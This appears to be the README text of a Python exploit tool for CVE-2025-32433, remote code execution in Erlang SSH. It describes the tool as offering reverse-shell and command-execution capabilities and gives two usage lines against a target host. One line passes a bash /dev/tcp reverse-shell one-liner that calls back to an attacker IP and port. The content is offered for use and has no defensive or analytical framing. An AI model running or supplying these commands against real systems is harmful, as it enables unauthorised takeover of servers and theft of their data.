
Python exploit for CVE-2025-32433 targeting Erlang SSH remote code execution with reverse shell and command execution capabilities.
python Erlang_SSH_RCE.py -t 192.168.100.123 -p 2222 --reverse 192.168.100.98 4444
python Erlang_SSH_RCE.py -t 192.168.100.123 -p 2222 -c "bash -c 'bash -i >& /dev/tcp/192.168.100.98/4444 0>&1'"